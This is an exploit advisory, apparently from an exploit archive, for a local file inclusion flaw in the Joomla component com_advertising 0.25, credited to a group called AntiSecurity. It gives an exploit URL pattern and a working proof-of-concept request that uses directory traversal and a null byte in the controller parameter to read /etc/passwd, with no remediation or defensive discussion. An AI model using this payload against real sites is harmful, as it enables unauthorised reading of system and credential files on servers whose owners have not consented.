id: 11746
date: 04/12/2010
title: Joomla Component com_advertising Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

===================================================================
Joomla Component com_advertising Local File Inclusion Vulnerability
===================================================================

=================================================================================================================
 
 
  [o] Joomla Component Easy Ad Banner Local File Inclusion Vulnerability
  
       Software : com_advertising version 0.25
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
=================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_advertising&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
 
 
=================================================================================================================



#  0day.today [2023-03-23]  #